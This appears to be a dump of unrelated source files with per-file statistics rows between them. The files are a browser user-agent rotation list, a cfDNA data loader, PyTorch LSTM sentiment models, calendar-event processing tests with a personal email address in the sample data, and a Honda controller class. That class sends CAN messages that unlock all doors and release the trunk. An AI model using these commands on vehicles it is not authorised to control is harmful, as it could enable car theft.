Chrome/63.0.3239.84 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36']
def getagent():
return {"User-Agent": shuffle(agents)}
| 461.666667
| 2,682
| 0.7213
| 533
| 2,770
| 3.746717
| 0.142589
| 0.115173
| 0.103655
| 0.241863
| 0.915373
| 0.915373
| 0.915373
| 0.897346
| 0.862293
| 0.862293
| 0
| 0.253419
| 0.102527
| 2,770
| 6
| 2,683
| 461.666667
| 0.549879
| 0
| 0
| 0
| 0
| 5.75
| 0.935042
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 15
|
d7712f265c56b382ef9e676dfb5c14a294c22aee
| 3,983
|
py
|
Python
|
glider/cfdna_glider.py
|
hillst/glider
|
499bbf64d97291c699eb4df1e2b57e24d0e90325
|
[
"MIT"
] | null | null | null |
glider/cfdna_glider.py
|
hillst/glider
|
499bbf64d97291c699eb4df1e2b57e24d0e90325
|
[
"MIT"
] | null | null | null |
glider/cfdna_glider.py
|
hillst/glider
|
499bbf64d97291c699eb4df1e2b57e24d0e90325
|
[
"MIT"
] | null | null | null |
'''
cfdna glider performs the QC and interpretation of cfDNA datas.
This should be run on the cluster lol.
'''
def load_all_data(datatype="union"):
from glider.data.annotations import load_data
data = []
data += load_data("BB053/trinuc_tsvs/BB053--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB053/trinuc_tsvs/BB053--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB053/trinuc_tsvs/BB053--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB053/trinuc_tsvs/BB053--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB053/trinuc_tsvs/BB053--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("BB342/trinuc_tsvs/BB342--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB342/trinuc_tsvs/BB342--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB342/trinuc_tsvs/BB342--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB342/trinuc_tsvs/BB342--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB342/trinuc_tsvs/BB342--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("BB427/trinuc_tsvs/BB427--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB427/trinuc_tsvs/BB427--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB427/trinuc_tsvs/BB427--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB427/trinuc_tsvs/BB427--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB427/trinuc_tsvs/BB427--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("BB672/trinuc_tsvs/BB672--BB1104." + datatype + ".tsv", biotype="control")
data += load_data("BB672/trinuc_tsvs/BB672--BB1116." + datatype + ".tsv", biotype="control")
data += load_data("BB672/trinuc_tsvs/BB672--BB1122." + datatype + ".tsv", biotype="control")
data += load_data("BB672/trinuc_tsvs/BB672--BB1125." + datatype + ".tsv", biotype="control")
data += load_data("BB672/trinuc_tsvs/BB672--BB1146." + datatype + ".tsv", biotype="control")
data += load_data("Pre-BB1104/trinuc_tsvs/Pre-BB1104--BB1104." + datatype + ".tsv", biotype="luad")
data += load_data("Pre-BB1116/trinuc_tsvs/Pre-BB1116--BB1116." + datatype + ".tsv", biotype="luad")
data += load_data("Pre-BB1122/trinuc_tsvs/Pre-BB1122--BB1122." + datatype + ".tsv", biotype="luad")
data += load_data("Pre-BB1125/trinuc_tsvs/Pre-BB1125--BB1125." + datatype + ".tsv", biotype="luad")
data += load_data("Pre-BB1146/trinuc_tsvs/Pre-BB1146--BB1146." + datatype + ".tsv", biotype="luad")
return data
def load_test():
from glider.data.annotations import load_data, as_dataframe
data = load_all_data("union")
print len(data)
print as_dataframe(data).describe()
print len(load_test())
| 69.877193
| 108
| 0.680392
| 513
| 3,983
| 5.126706
| 0.097466
| 0.112548
| 0.159696
| 0.285171
| 0.847148
| 0.847148
| 0.847148
| 0.805323
| 0.689354
| 0.66654
| 0
| 0.103419
| 0.126036
| 3,983
| 56
| 109
| 71.125
| 0.652111
| 0
| 0
| 0
| 0
| 0
| 0.431302
| 0.333161
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.044444
| null | null | 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad96c82e37324ab7b6f35d87f153137f1666ac5f
| 8,874
|
py
|
Python
|
models/LSTM.py
|
salmanedhi/NNTI-WS2021-NLP-Project
|
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
|
[
"MIT"
] | null | null | null |
models/LSTM.py
|
salmanedhi/NNTI-WS2021-NLP-Project
|
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
|
[
"MIT"
] | null | null | null |
models/LSTM.py
|
salmanedhi/NNTI-WS2021-NLP-Project
|
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
|
[
"MIT"
] | null | null | null |
import torch as torch
from torch import nn
class SentimentLSTM(nn.Module):
def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5):
super().__init__()
# params: "n_" means dimension
self.n_vocab = n_vocab # number of unique words in vocabulary
self.n_layers = n_layers # number of LSTM layers
self.n_hidden = n_hidden # number of hidden nodes in LSTM
self.embedding = nn.Embedding(n_vocab, n_embed)
#embeddings is a torch tensor.
self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words, batch_size):
# INPUT : (batch_size, seq_length)
embedded_words = self.embedding(input_words) # (batch_size, seq_length, n_embed)
lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden)
fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output)
sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output)
sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output)
# extract the output of ONLY the LAST output of the LAST element of the sequence
sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1)
return sigmoid_last, h
def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0
# device = "cuda" if torch.cuda.is_available() else "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
class SentimentLSTM_bengali(nn.Module):
def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5):
super().__init__()
# params: "n_" means dimension
self.n_vocab = n_vocab # number of unique words in vocabulary
self.n_layers = n_layers # number of LSTM layers
self.n_hidden = n_hidden # number of hidden nodes in LSTM
self.embedding = nn.Embedding(n_vocab, n_embed)
#embeddings is a torch tensor.
self.embedding.weight = nn.Parameter(embedding_weights)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words, batch_size):
# INPUT : (batch_size, seq_length)
embedded_words = self.embedding(input_words) # (batch_size, seq_length, n_embed)
lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden)
fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output)
sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output)
sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output)
# extract the output of ONLY the LAST output of the LAST element of the sequence
sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1)
return sigmoid_last, h
def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0
# device = "cuda" if torch.cuda.is_available() else "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
class SentimentLSTM_task3(nn.Module):
def __init__(self, n_vocab, batch_size, n_embed, n_hidden, n_output, n_layers, drop_p = 0.5):
super().__init__()
# params: "n_" means dimension
self.n_vocab = n_vocab # number of unique words in vocabulary
self.n_layers = n_layers # number of LSTM layers
self.n_hidden = n_hidden # number of hidden nodes in LSTM
self.embedding = nn.Embedding(n_vocab, n_embed)
#embeddings is a torch tensor.
# self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False)
nn.Conv1d(in_channels=batch_size, out_channels=batch_size, kernel_size=1, stride=1)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words, batch_size):
# INPUT : (batch_size, seq_length)
embedded_words = self.embedding(input_words)# (batch_size, seq_length, n_embed)
lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden)
fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output)
sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output)
sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output)
# extract the output of ONLY the LAST output of the LAST element of the sequence
sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1)
return sigmoid_last, h
def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0
# device = "cuda" if torch.cuda.is_available() else "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
class SentimentLSTM_task3_bengali(nn.Module):
def __init__(self, n_vocab, batch_size, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5):
super().__init__()
# params: "n_" means dimension
self.n_vocab = n_vocab # number of unique words in vocabulary
self.n_layers = n_layers # number of LSTM layers
self.n_hidden = n_hidden # number of hidden nodes in LSTM
self.embedding = nn.Embedding(n_vocab, n_embed)
self.embedding.weight = nn.Parameter(embedding_weights)
#embeddings is a torch tensor.
# self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False)
nn.Conv1d(in_channels=batch_size, out_channels=batch_size, kernel_size=1, stride=1)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words, batch_size):
# INPUT : (batch_size, seq_length)
embedded_words = self.embedding(input_words)# (batch_size, seq_length, n_embed)
lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden)
fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output)
sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output)
sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output)
# extract the output of ONLY the LAST output of the LAST element of the sequence
sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1)
return sigmoid_last, h
def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0
# device = "cuda" if torch.cuda.is_available() else "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
| 49.575419
| 116
| 0.639959
| 1,240
| 8,874
| 4.287097
| 0.071774
| 0.098194
| 0.063205
| 0.094808
| 0.99003
| 0.99003
| 0.99003
| 0.981377
| 0.978743
| 0.978743
| 0
| 0.00546
| 0.25693
| 8,874
| 179
| 117
| 49.575419
| 0.800728
| 0.283638
| 0
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108108
| false
| 0
| 0.018018
| 0
| 0.234234
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ada0a18a20d5a2757694a3df16dea2d62364f995
| 6,173
|
py
|
Python
|
test_process_events.py
|
brianLeeson/proj10-MeetMe
|
d1262290e8bcad4b4e220490f8391bd8c26432eb
|
[
"Artistic-2.0"
] | null | null | null |
test_process_events.py
|
brianLeeson/proj10-MeetMe
|
d1262290e8bcad4b4e220490f8391bd8c26432eb
|
[
"Artistic-2.0"
] | 3
|
2021-02-08T20:17:15.000Z
|
2021-06-01T21:50:35.000Z
|
test_process_events.py
|
brianLeeson/proj10-MeetMe
|
d1262290e8bcad4b4e220490f8391bd8c26432eb
|
[
"Artistic-2.0"
] | null | null | null |
from process_events import *
def test_relevantEvents():
#Test 1 - normal. 1 event provided, 1 event created
eventList = [{'organizer': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'kind': 'calendar#event', 'id': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g', 'start': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T06:00:00-08:00'}, 'updated': '2016-11-15T21:42:03.235Z', 'htmlLink': 'https://www.google.com/calendar/event?eid=NjRvNmNvYjU2dGo2MmI5aGNrcW04YjlrNzFoNjJiOW82b3EzY2I5bjZzbzYybzlqNjFoajZvaHA2ZyBjeWJlcmp1bmtpZTA5QG0', 'sequence': 0, 'summary': 'Running', 'creator': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'iCalUID': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g@google.com', 'etag': '"2958492246350000"', 'reminders': {'overrides': [{'method': 'popup', 'minutes': 30}], 'useDefault': False}, 'end': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T07:00:00-08:00'}, 'created': '2016-11-15T21:42:03.000Z', 'status': 'confirmed'}]
rangeStart = "2016-01-01T00:00:00-08:00"
rangeEnd = "2016-01-01T23:59:00-08:00"
result = [{'organizer': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'kind': 'calendar#event', 'id': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g', 'start': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T06:00:00-08:00'}, 'updated': '2016-11-15T21:42:03.235Z', 'htmlLink': 'https://www.google.com/calendar/event?eid=NjRvNmNvYjU2dGo2MmI5aGNrcW04YjlrNzFoNjJiOW82b3EzY2I5bjZzbzYybzlqNjFoajZvaHA2ZyBjeWJlcmp1bmtpZTA5QG0', 'sequence': 0, 'summary': 'Running', 'creator': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'iCalUID': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g@google.com', 'etag': '"2958492246350000"', 'reminders': {'overrides': [{'method': 'popup', 'minutes': 30}], 'useDefault': False}, 'end': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T07:00:00-08:00'}, 'created': '2016-11-15T21:42:03.000Z', 'status': 'confirmed'}]
assert( relevantEvents(eventList, rangeStart, rangeEnd)== result)
#Test 2 - null. no event
eventList = []
rangeStart = "2016-01-01T00:00:00-08:00"
rangeEnd = "2016-01-01T23:59:00-08:00"
assert(relevantEvents(eventList, rangeStart, rangeEnd) == [] )
def test_groupByDay():
#Test 1 - null. no events
assert(groupByDay([])==[])
#Test 2 - Single event
bEvents = [['2016-11-16T06:00:00-08:00', '2016-11-16T07:00:00-08:00']]
bGrouped = [[{'start': '2016-11-16T06:00:00-08:00', 'end': '2016-11-16T07:00:00-08:00'}]]
assert(groupByDay(bEvents) == bGrouped)
#Test 3 - Multiple days
bEvents = [['2016-11-17T18:00:00-08:00', '2016-11-17T19:00:00-08:00'], ['2016-11-17T17:45:00-08:00', '2016-11-17T18:45:00-08:00'], ['2016-11-16T06:00:00-08:00', '2016-11-16T07:00:00-08:00']]
bGrouped = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00'}], [{'end': '2016-11-17T18:45:00-08:00', 'start': '2016-11-17T17:45:00-08:00'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00'}]]
assert(groupByDay(bEvents) == bGrouped)
def test_mergeBusy():
#Test1 - multiple events. some needed merging
gEvents = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00'}], [{'end': '2016-11-17T18:45:00-08:00', 'start': '2016-11-17T17:45:00-08:00'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00'}]]
mBlocks = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00', 'summary': 'Busy'}], [{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}]]
assert(mergeBusy(gEvents) == mBlocks)
#Test2 - null. no events
gEvents = []
mBlocks = []
assert(mergeBusy(gEvents) == mBlocks)
def test_addFree():
#Test1 - null
bBlocks = []
sTime = "2016-01-01T00:00:00-08:00"
eTime = "2016-01-01T23:59:00-08:00"
sDate = "2016-11-17T00:00:00-08:00"
eDate = "2016-11-18T00:00:00-08:00"
fBSorted = [[{'end': '2016-11-17T23:59:00-08:00', 'start': '2016-11-17T00:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}]]
assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted)
#Test2 - single event
bBlocks = [[{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00', 'summary': 'Busy'}]]
sTime = "2016-01-01T00:00:00-08:00"
eTime = "2016-01-01T23:59:00-08:00"
sDate = "2016-11-17T00:00:00-08:00"
eDate = "2016-11-18T00:00:00-08:00"
fBSorted = [[{'end': '2016-11-17T18:00:00-08:00', 'start': '2016-11-17T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-17T23:59:00-08:00', 'start': '2016-11-17T19:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}]]
assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted)
#Test3 - overlapping events
bBlocks = [[{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}], [{'end': '2016-11-18T17:00:00-08:00', 'start': '2016-11-18T16:00:00-08:00', 'summary': 'Busy'}]]
sTime = "2016-01-01T00:00:00-08:00"
eTime = "2016-01-01T23:59:00-08:00"
sDate = "2016-11-17T00:00:00-08:00"
eDate = "2016-11-18T00:00:00-08:00"
fBSorted = [[{'end': '2016-11-17T17:45:00-08:00', 'start': '2016-11-17T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-17T23:59:00-08:00', 'start': '2016-11-17T19:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T16:00:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-18T17:00:00-08:00', 'start': '2016-11-18T16:00:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T17:00:00-08:00', 'summary': 'Free'}]]
assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted)
| 78.139241
| 968
| 0.654787
| 921
| 6,173
| 4.378936
| 0.127036
| 0.075378
| 0.113067
| 0.1091
| 0.888916
| 0.865609
| 0.865609
| 0.840317
| 0.821721
| 0.818993
| 0
| 0.290825
| 0.094282
| 6,173
| 78
| 969
| 79.141026
| 0.430513
| 0.042929
| 0
| 0.479167
| 0
| 0
| 0.61558
| 0.397488
| 0
| 0
| 0
| 0
| 0.208333
| 1
| 0.083333
| false
| 0
| 0.020833
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a8e66bca30493a897474cbd828a55b935d9c7ea4
| 2,809
|
py
|
Python
|
honda/__init__.py
|
gregjhogan/openioc
|
d79b17dfe8b6780f8ade248f14264061fe40e630
|
[
"MIT"
] | 17
|
2020-08-10T00:21:39.000Z
|
2022-02-19T14:02:24.000Z
|
honda/__init__.py
|
gregjhogan/openioc
|
d79b17dfe8b6780f8ade248f14264061fe40e630
|
[
"MIT"
] | 1
|
2021-06-05T16:00:39.000Z
|
2021-06-06T01:53:56.000Z
|
honda/__init__.py
|
gregjhogan/openioc
|
d79b17dfe8b6780f8ade248f14264061fe40e630
|
[
"MIT"
] | 5
|
2020-08-09T05:30:43.000Z
|
2021-08-05T12:40:31.000Z
|
class HondaInputOutputController:
def __init__(self, send_func):
self.send = send_func
def left_turn_signal(self, on):
if on:
msg = b"\x30\x0a\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def right_turn_signal(self, on):
if on:
msg = b"\x30\x0b\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def hazard_lights(self, on):
if on:
msg = b"\x30\x08\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def parking_lights(self, on):
if on:
msg = b"\x30\x25\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def headlight_low_beams(self, on):
if on:
msg = b"\x30\x1c\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def headlight_high_beams(self, on):
if on:
msg = b"\x30\x1d\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def front_fog_lights(self, on):
if on:
msg = b"\x30\x20\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def daytime_running_lights(self, on):
if on:
msg = b"\x30\x36\x0f\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def lock_all_doors(self):
self.send(0x16f118f0, b"\x30\x04\x01\x00\x00\x00\x00\x00")
def unlock_all_doors(self):
self.send(0x16f118f0, b"\x30\x05\x01\x00\x00\x00\x00\x00")
def unlock_all_doors_alt(self):
self.send(0x16f118f0, b"\x30\x06\x01\x00\x00\x00\x00\x00")
def trunk_release(self):
self.send(0x16f118f0, b"\x30\x09\x01\x00\x00\x00\x00\x00")
def front_wipers_slow(self, on):
if on:
msg = b"\x30\x19\x05\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def front_wipers_fast(self, on):
if on:
msg = b"\x30\x1a\x05\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def front_washer_pump(self, on):
if on:
msg = b"\x30\x1b\x05\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def rear_wiper(self, on):
if on:
msg = b"\x30\x0d\x05\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def rear_washer_pump(self, on):
if on:
msg = b"\x30\x0e\x05\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f118f0, msg)
def left_blindspot_flash(self, on):
if on:
msg = b"\x30\x01\x08\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f19ff0, msg)
def right_blindspot_flash(self, on):
if on:
msg = b"\x30\x01\x08\x00\x00\x00\x00\x00"
else:
msg = b"\x20"
self.send(0x16f1a7f0, msg)
| 23.02459
| 62
| 0.599858
| 466
| 2,809
| 3.527897
| 0.143777
| 0.277372
| 0.312044
| 0.277372
| 0.846107
| 0.846107
| 0.814477
| 0.757908
| 0.638686
| 0.572993
| 0
| 0.210304
| 0.239943
| 2,809
| 121
| 63
| 23.214876
| 0.559719
| 0
| 0
| 0.594059
| 0
| 0
| 0.237892
| 0.216524
| 0
| 0
| 0.067664
| 0
| 0
| 1
| 0.19802
| false
| 0
| 0
| 0
| 0.207921
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f93157fe609a37371eaf51c980572bb6d401bf5
| 540
|
py
|
Python
|
eval_mosmed_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
